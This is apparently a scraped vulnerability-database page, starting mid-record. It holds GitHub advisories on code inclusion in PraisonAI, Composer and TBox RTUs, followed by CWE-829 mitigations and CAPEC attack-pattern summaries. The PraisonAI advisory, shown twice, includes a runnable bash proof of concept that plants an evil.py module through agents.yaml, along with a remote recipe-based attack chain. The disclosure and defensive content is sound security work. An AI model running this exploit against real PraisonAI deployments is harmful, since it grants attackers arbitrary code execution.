unpatched.\u003c/p\u003e\n\u003ch3\u003eVulnerable code\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003e# praisonai/agents_generator.py  (master HEAD; v4.6.37)\n\n336    def load_tools_from_module(self, module_path):\n           # ...\n349        spec = importlib.util.spec_from_file_location(\"tools_module\", module_path)\n350        module = importlib.util.module_from_spec(spec)\n351        spec.loader.exec_module(module)               # \u2190 NO gate\n\n372    def load_tools_from_module_class(self, module_path):\n           # ...  (same pattern \u2014 spec_from_file_location \u2192 exec_module, no gate)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eNeither function checks \u003ccode\u003ePRAISONAI_ALLOW_LOCAL_TOOLS\u003c/code\u003e. Neither validates \u003ccode\u003emodule_path\u003c/code\u003e against an allowlist. The \u003ccode\u003emodule_path\u003c/code\u003e value originates from YAML agent configuration (\u003ccode\u003eagents.yaml\u003c/code\u003e) tool definitions, which can be:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAttacker-controlled via shared/writable config directory\u003c/strong\u003e \u2014 same CWD-plant vector as CVE-2026-40156.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAttacker-controlled via recipe/GitHub fetch\u003c/strong\u003e \u2014 same remote trigger as CVE-2026-44334 (\u003ccode\u003ePOST /v1/recipes/run\u003c/code\u003e with \u003ccode\u003eallow_any_github=True\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAttacker-influenced via prompt injection\u003c/strong\u003e \u2014 an LLM agent instructed to load tools from a crafted path reaches these functions through the agent orchestration layer.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch3\u003eAttack chain (recipe vector)\u003c/h3\u003e\n\u003cpre\u003e\u003ccode\u003eHTTP POST /v1/recipes/run\n  body: {\"recipe\": \"github:\u0026lt;attacker\u0026gt;/\u0026lt;repo\u0026gt;/\u0026lt;recipe\u0026gt;\"}\n        \u2502\n        \u25bc\n  Recipe fetched \u2192 agents.yaml contains:\n    tools:\n      - module_path: ./evil.py        # colocated in recipe dir\n        \u2502\n        \u25bc\n  AgentsGenerator.load_tools_from_module(\"./evil.py\")\n        \u2502\n        \u25bc\n  agents_generator.py:349   spec = spec_from_file_location(\"tools_module\", \"./evil.py\")\n  agents_generator.py:351   spec.loader.exec_module(module)   \u2190 RCE\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eNo \u003ccode\u003ePRAISONAI_ALLOW_LOCAL_TOOLS\u003c/code\u003e check. No auth required (legacy server default). Module-level code executes during tool registry construction, before any LLM call.\u003c/p\u003e\n\u003ch3\u003ePoC\u003c/h3\u003e\n\u003cpre\u003e\u003ccode class=\"language-bash\"\u003e#!/usr/bin/env bash\n# Requires: pip install praisonai (any version \u0026gt;= 2.0.0, \u0026lt;= 4.6.37)\nset -euo pipefail\n\nWORKDIR=$(mktemp -d)\ntrap \"rm -rf $WORKDIR\" EXIT\n\n# 1. Malicious module\ncat \u0026gt; \"$WORKDIR/evil.py\" \u0026lt;\u0026lt; \u0027PYEOF\u0027\nimport os, sys, tempfile, time\nmarker = os.path.join(tempfile.gettempdir(),\n                      f\"praisonai_agents_gen_pwn_{int(time.time())}.txt\")\nwith open(marker, \"w\") as f:\n    f.write(f\"uid={os.getuid()} pid={os.getpid()} argv={sys.argv}\\n\")\nprint(f\"[agents_generator bypass] RCE fired. Marker: {marker}\", flush=True)\n\ndef dummy_tool():\n    \"\"\"Placeholder so tool scan finds something.\"\"\"\n    pass\nPYEOF\n\n# 2. agents.yaml that references it\ncat \u0026gt; \"$WORKDIR/agents.yaml\" \u0026lt;\u0026lt; \u0027YAMLEOF\u0027\nframework: praisonai\ntopic: \"PoC \u2014 agents_generator exec_module bypass\"\nroles:\n  poc_agent:\n    role: PoC\n    goal: Trigger load_tools_from_module\n    backstory: n/a\n    tools:\n      - evil.py\nYAMLEOF\n\n# 3. Run\ncd \"$WORKDIR\"\npython -c \"\nfrom praisonai import PraisonAI\ntry:\n    ai = PraisonAI(agent_file=\u0027agents.yaml\u0027)\n    ai.main()\nexcept Exception:\n    pass  # downstream failure expected; exec_module already fired\n\"\n\n# 4. Verify\nMARKER=$(ls /tmp/praisonai_agents_gen_pwn_*.txt 2\u0026gt;/dev/null | tail -1)\nif [ -n \"$MARKER\" ]; then\n    echo \"SUCCESS \u2014 marker file written by server process:\"\n    cat \"$MARKER\"\nelse\n    echo \"FAIL \u2014 marker not found\"\n    exit 1\nfi\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eImpact\u003c/h3\u003e\n\u003cp\u003eArbitrary code execution with the privileges of the PraisonAI process. The attacker payload runs during tool registry construction \u2014 before any LLM interaction \u2014 so no API keys or model access are required for the exploit to succeed. In CI/CD and shared-server environments, any user who can write an \u003ccode\u003eagents.yaml\u003c/code\u003e or colocate a \u003ccode\u003e.py\u003c/code\u003e file achieves code execution as the service account.\u003c/p\u003e\n\u003ch3\u003eSeverity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eHigh\u003c/strong\u003e \u2014 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (7.8)\u003c/p\u003e\n\u003cp\u003eWhen combined with the recipe server\u0027s default no-auth posture and \u003ccode\u003eallow_any_github=True\u003c/code\u003e, the attack becomes \u003cstrong\u003enetwork-reachable without authentication\u003c/strong\u003e, elevating to:\u003c/p\u003e\n\u003cp\u003eCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\u003c/p\u003e\n\u003ch3\u003eCWE\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\u003c/li\u003e\n\u003cli\u003eCWE-426: Untrusted Search Path\u003c/li\u003e\n\u003cli\u003eCWE-829: Inclusion of Functionality from Untrusted Control Sphere\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAffected versions\u003c/h3\u003e\n\u003cp\u003eAll versions containing \u003ccode\u003eagents_generator.py\u003c/code\u003e with these functions \u2014 at minimum \u003ccode\u003e\u0026gt;= 2.0.0, \u0026lt;= 4.6.37\u003c/code\u003e (current \u003ccode\u003emaster\u003c/code\u003e HEAD).\u003c/p\u003e\n\u003ch3\u003eSuggested fix\u003c/h3\u003e\n\u003cp\u003eApply the same \u003ccode\u003ePRAISONAI_ALLOW_LOCAL_TOOLS\u003c/code\u003e env-var gate used in \u003ccode\u003etool_resolver.py\u003c/code\u003e and \u003ccode\u003eapi/call.py\u003c/code\u003e to both call sites in \u003ccode\u003eagents_generator.py\u003c/code\u003e:\u003c/p\u003e\n\u003cpre\u003e\u003ccode class=\"language-python\"\u003eimport os\n\ndef load_tools_from_module(self, module_path):\n    if os.environ.get(\"PRAISONAI_ALLOW_LOCAL_TOOLS\", \"\").lower() != \"true\":\n        return []\n    # ... existing logic ...\n\ndef load_tools_from_module_class(self, module_path):\n    if os.environ.get(\"PRAISONAI_ALLOW_LOCAL_TOOLS\", \"\").lower() != \"true\":\n        return []\n    # ... existing logic ...\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eAdditionally, validate \u003ccode\u003emodule_path\u003c/code\u003e against a strict allowlist of expected tool module locations rather than accepting arbitrary filesystem paths.\u003c/p\u003e\n\u003ch3\u003eCredit\u003c/h3\u003e\n\u003cp\u003eKai Aizen \u0026amp; Avraham Shemesh / \u003ca href=\"https://snailsploit.com/\"\u003eSnailSploit\u003c/a\u003e\u003c/p\u003e\u003c/body\u003e\u003c/html\u003e## Arbitrary code execution via ungated `spec.loader.exec_module` in `agents_generator.py` (v4.6.32 chokepoint refactor bypass)\n\n### TL;DR\n\nThe v4.6.32 chokepoint refactor (which patched CVE-2026-44334 / GHSA-xcmw-grxf-wjhj) added the `PRAISONAI_ALLOW_LOCAL_TOOLS` env-var gate to the `tool_override.py` sinks. However, **two additional `spec.loader.exec_module` call sites** in `praisonai/agents_generator.py` were missed and remain completely unguarded on current `master` (v4.6.37). Both functions accept a `module_path` parameter sourced from YAML configuration and execute it without validation, signature checking, or the env-var gate.\n\n### Patch lineage\n\n| CVE | GHSA | Fixed in | What was patched |\n| --- | --- | --- | --- |\n| CVE-2026-40156 | GHSA-2g3w-cpc4-chr4 | 4.5.128 | CWD `tools.py` auto-load in `tool_resolver.py` |\n| CVE-2026-40287 | GHSA-g985-wjh9-qxxc | 4.5.139 | Env-var gate added to `tool_resolver.py` + `api/call.py` |\n| CVE-2026-44334 | GHSA-xcmw-grxf-wjhj | 4.6.32 | Missed sink in `templates/tool_override.py` |\n| **This finding** | \u2014 | **unfixed** | Missed sinks in `agents_generator.py` |\n\nEvery prior patch addressed a subset of `exec_module` call sites. The two sinks documented here were present throughout the entire fix sequence and remain unpatched.\n\n### Vulnerable code\n\n```python\n# praisonai/agents_generator.py  (master HEAD; v4.6.37)\n\n336    def load_tools_from_module(self, module_path):\n           # ...\n349        spec = importlib.util.spec_from_file_location(\"tools_module\", module_path)\n350        module = importlib.util.module_from_spec(spec)\n351        spec.loader.exec_module(module)               # \u2190 NO gate\n\n372    def load_tools_from_module_class(self, module_path):\n           # ...  (same pattern \u2014 spec_from_file_location \u2192 exec_module, no gate)\n```\n\nNeither function checks `PRAISONAI_ALLOW_LOCAL_TOOLS`. Neither validates `module_path` against an allowlist. The `module_path` value originates from YAML agent configuration (`agents.yaml`) tool definitions, which can be:\n\n1. **Attacker-controlled via shared/writable config directory** \u2014 same CWD-plant vector as CVE-2026-40156.\n2. **Attacker-controlled via recipe/GitHub fetch** \u2014 same remote trigger as CVE-2026-44334 (`POST /v1/recipes/run` with `allow_any_github=True`).\n3. **Attacker-influenced via prompt injection** \u2014 an LLM agent instructed to load tools from a crafted path reaches these functions through the agent orchestration layer.\n\n### Attack chain (recipe vector)\n\n```\nHTTP POST /v1/recipes/run\n  body: {\"recipe\": \"github:\u003cattacker\u003e/\u003crepo\u003e/\u003crecipe\u003e\"}\n        \u2502\n        \u25bc\n  Recipe fetched \u2192 agents.yaml contains:\n    tools:\n      - module_path: ./evil.py        # colocated in recipe dir\n        \u2502\n        \u25bc\n  AgentsGenerator.load_tools_from_module(\"./evil.py\")\n        \u2502\n        \u25bc\n  agents_generator.py:349   spec = spec_from_file_location(\"tools_module\", \"./evil.py\")\n  agents_generator.py:351   spec.loader.exec_module(module)   \u2190 RCE\n```\n\nNo `PRAISONAI_ALLOW_LOCAL_TOOLS` check. No auth required (legacy server default). Module-level code executes during tool registry construction, before any LLM call.\n\n### PoC\n\n```bash\n#!/usr/bin/env bash\n# Requires: pip install praisonai (any version \u003e= 2.0.0, \u003c= 4.6.37)\nset -euo pipefail\n\nWORKDIR=$(mktemp -d)\ntrap \"rm -rf $WORKDIR\" EXIT\n\n# 1. Malicious module\ncat \u003e \"$WORKDIR/evil.py\" \u003c\u003c \u0027PYEOF\u0027\nimport os, sys, tempfile, time\nmarker = os.path.join(tempfile.gettempdir(),\n                      f\"praisonai_agents_gen_pwn_{int(time.time())}.txt\")\nwith open(marker, \"w\") as f:\n    f.write(f\"uid={os.getuid()} pid={os.getpid()} argv={sys.argv}\\n\")\nprint(f\"[agents_generator bypass] RCE fired. Marker: {marker}\", flush=True)\n\ndef dummy_tool():\n    \"\"\"Placeholder so tool scan finds something.\"\"\"\n    pass\nPYEOF\n\n# 2. agents.yaml that references it\ncat \u003e \"$WORKDIR/agents.yaml\" \u003c\u003c \u0027YAMLEOF\u0027\nframework: praisonai\ntopic: \"PoC \u2014 agents_generator exec_module bypass\"\nroles:\n  poc_agent:\n    role: PoC\n    goal: Trigger load_tools_from_module\n    backstory: n/a\n    tools:\n      - evil.py\nYAMLEOF\n\n# 3. Run\ncd \"$WORKDIR\"\npython -c \"\nfrom praisonai import PraisonAI\ntry:\n    ai = PraisonAI(agent_file=\u0027agents.yaml\u0027)\n    ai.main()\nexcept Exception:\n    pass  # downstream failure expected; exec_module already fired\n\"\n\n# 4. Verify\nMARKER=$(ls /tmp/praisonai_agents_gen_pwn_*.txt 2\u003e/dev/null | tail -1)\nif [ -n \"$MARKER\" ]; then\n    echo \"SUCCESS \u2014 marker file written by server process:\"\n    cat \"$MARKER\"\nelse\n    echo \"FAIL \u2014 marker not found\"\n    exit 1\nfi\n```\n\n### Impact\n\nArbitrary code execution with the privileges of the PraisonAI process. The attacker payload runs during tool registry construction \u2014 before any LLM interaction \u2014 so no API keys or model access are required for the exploit to succeed. In CI/CD and shared-server environments, any user who can write an `agents.yaml` or colocate a `.py` file achieves code execution as the service account.\n\n### Severity\n\n**High** \u2014 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (7.8)\n\nWhen combined with the recipe server\u0027s default no-auth posture and `allow_any_github=True`, the attack becomes **network-reachable without authentication**, elevating to:\n\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)\n\n### CWE\n\n- CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\n- CWE-426: Untrusted Search Path\n- CWE-829: Inclusion of Functionality from Untrusted Control Sphere\n\n### Affected versions\n\nAll versions containing `agents_generator.py` with these functions \u2014 at minimum `\u003e= 2.0.0, \u003c= 4.6.37` (current `master` HEAD).\n\n### Suggested fix\n\nApply the same `PRAISONAI_ALLOW_LOCAL_TOOLS` env-var gate used in `tool_resolver.py` and `api/call.py` to both call sites in `agents_generator.py`:\n\n```python\nimport os\n\ndef load_tools_from_module(self, module_path):\n    if os.environ.get(\"PRAISONAI_ALLOW_LOCAL_TOOLS\", \"\").lower() != \"true\":\n        return []\n    # ... existing logic ...\n\ndef load_tools_from_module_class(self, module_path):\n    if os.environ.get(\"PRAISONAI_ALLOW_LOCAL_TOOLS\", \"\").lower() != \"true\":\n        return []\n    # ... existing logic ...\n```\n\nAdditionally, validate `module_path` against a strict allowlist of expected tool module locations rather than accepting arbitrary filesystem paths.\n\n### Credit\n\nKai Aizen \u0026 Avraham Shemesh / [[SnailSploit](https://snailsploit.com/)](https://snailsploit.com)",
  "id": "GHSA-78r8-wwqv-r299",
  "modified": "2026-05-29T22:26:31Z",
  "published": "2026-05-29T22:26:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-78r8-wwqv-r299"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Arbitrary code execution via unguarded `spec.loader.exec_module` in `agents_generator.py` - sibling of CVE-2026-44334"
}

GHSA-7C6P-848J-WH5H

Vulnerability from github – Published: 2024-02-08 15:06 – Updated: 2024-02-09 17:49
VLAI
Summary
Composer code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php
Details

Impact

Several files within the local working directory are included during the invocation of Composer and in the context of the executing user.

As such, under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files.

All Composer CLI commands are affected, including composer.phar's self-update.

The following are of high risk:

  • Composer being run with sudo.
  • Pipelines which may execute Composer on untrusted projects.
  • Shared environments with developers who run Composer individually on the same project.

Patches

2.7.0, 2.2.23

Workarounds

  • It is advised that the patched versions are applied at the earliest convenience.

Where not possible, the following should be addressed: - Remove all sudo composer privileges for all users to mitigate root privilege escalation.
- Avoid running Composer within an untrusted directory, or if needed, verify that the contents of vendor/composer/InstalledVersions.php and vendor/composer/installed.php do not include untrusted code.

A reset can also be done on these files by the following:

rm vendor/composer/installed.php vendor/composer/InstalledVersions.php
composer install --no-scripts --no-plugins
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "composer/composer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-alpha1"
            },
            {
              "fixed": "2.2.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "composer/composer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0-rc1"
            },
            {
              "fixed": "2.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-24821"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-08T15:06:38Z",
    "nvd_published_at": "2024-02-09T00:15:08Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nSeveral files within the local working directory are included during the invocation of Composer and in the context of the executing user.\n\nAs such,  under certain conditions arbitrary code execution may lead to local privilege escalation, provide lateral user movement or malicious code execution when Composer is invoked within a directory with tampered files.\n\nAll Composer CLI commands are affected, including composer.phar\u0027s self-update.\n\nThe following are of high risk:\n\n- Composer being run with sudo.\n- Pipelines which may execute Composer on untrusted projects.\n- Shared environments with developers who run Composer individually on the same project.\n\n### Patches\n\n2.7.0, 2.2.23\n\n### Workarounds\n\n- It is advised that the patched versions are applied at the earliest convenience.\n\nWhere not possible, the following should be addressed:\n- Remove all sudo composer privileges for all users to mitigate root privilege escalation.  \n- Avoid running Composer within an untrusted directory, or if needed, verify that the contents of `vendor/composer/InstalledVersions.php` and `vendor/composer/installed.php` do not include untrusted code. \n\nA reset can also be done on these files by the following:\n\n```sh\nrm vendor/composer/installed.php vendor/composer/InstalledVersions.php\ncomposer install --no-scripts --no-plugins\n```",
  "id": "GHSA-7c6p-848j-wh5h",
  "modified": "2024-02-09T17:49:02Z",
  "published": "2024-02-08T15:06:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/composer/composer/security/advisories/GHSA-7c6p-848j-wh5h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24821"
    },
    {
      "type": "WEB",
      "url": "https://github.com/composer/composer/commit/64e4eb356b159a30c766cd1ea83450a38dc23bf5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/composer/composer/commit/77e3982918bc1d886843dc3d5e575e7e871b27b7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/composer/composer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Composer code execution and possible privilege escalation via compromised InstalledVersions.php or installed.php"
}

GHSA-7CXV-6X8V-9GMQ

Vulnerability from github – Published: 2023-07-03 21:30 – Updated: 2024-04-04 05:20
VLAI
Details

The affected TBox RTUs run OpenVPN with root privileges and can run user defined configuration scripts. An attacker could set up a local OpenVPN server and push a malicious script onto the TBox host to acquire root privileges.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-36609"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-03T20:15:09Z",
    "severity": "HIGH"
  },
  "details": "\nThe affected TBox RTUs run OpenVPN with root privileges and can run user defined configuration scripts. An attacker could set up a local OpenVPN server and push a malicious script onto the TBox host to acquire root privileges.\n\n",
  "id": "GHSA-7cxv-6x8v-9gmq",
  "modified": "2024-04-04T05:20:40Z",
  "published": "2023-07-03T21:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36609"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-180-03"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-4
Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].

Mitigation MIT-21.1
Architecture and Design

Strategy: Enforcement by Conversion

  • When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
  • For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.
Mitigation MIT-15
Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Mitigation MIT-22
Architecture and Design Operation

Strategy: Sandbox or Jail

  • Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
  • OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-34
Architecture and Design Operation

Strategy: Attack Surface Reduction

  • Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.
  • This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.
Mitigation MIT-6
Architecture and Design Implementation

Strategy: Attack Surface Reduction

  • Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
  • Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components.
Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-175: Code Inclusion

An adversary exploits a weakness on the target to force arbitrary code to be retrieved locally or from a remote location and executed. This differs from code injection in that code injection involves the direct inclusion of code while code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-201: Serialized Data External Linking

An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.

CAPEC-228: DTD Injection

An attacker injects malicious content into an application's DTD in an attempt to produce a negative technical impact. DTDs are used to describe how XML documents are processed. Certain malformed DTDs (for example, those with excessive entity expansion as described in CAPEC 197) can cause the XML parsers that process the DTDs to consume excessive resources resulting in resource depletion.

CAPEC-251: Local Code Inclusion

The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.

CAPEC-252: PHP Local File Inclusion

The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.

CAPEC-253: Remote Code Inclusion

The attacker forces an application to load arbitrary code files from a remote location. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load malicious files that the attacker placed on the remote machine, or to otherwise change the functionality of the targeted application in unexpected ways.

CAPEC-263: Force Use of Corrupted Files

This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.

CAPEC-538: Open-Source Library Manipulation

Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.

CAPEC-549: Local Execution of Code

An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.

CAPEC-640: Inclusion of Code in Existing Process

The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, function hooking, reflective code loading, and more.

CAPEC-660: Root/Jailbreak Detection Evasion via Hooking

An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to "hook" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.

CAPEC-695: Repo Jacking

An adversary takes advantage of the redirect property of directly linked Version Control System (VCS) repositories to trick users into incorporating malicious code into their applications.

CAPEC-698: Install Malicious Extension

An adversary directly installs or tricks a user into installing a malicious extension into existing trusted software, with the goal of achieving a variety of negative technical impacts.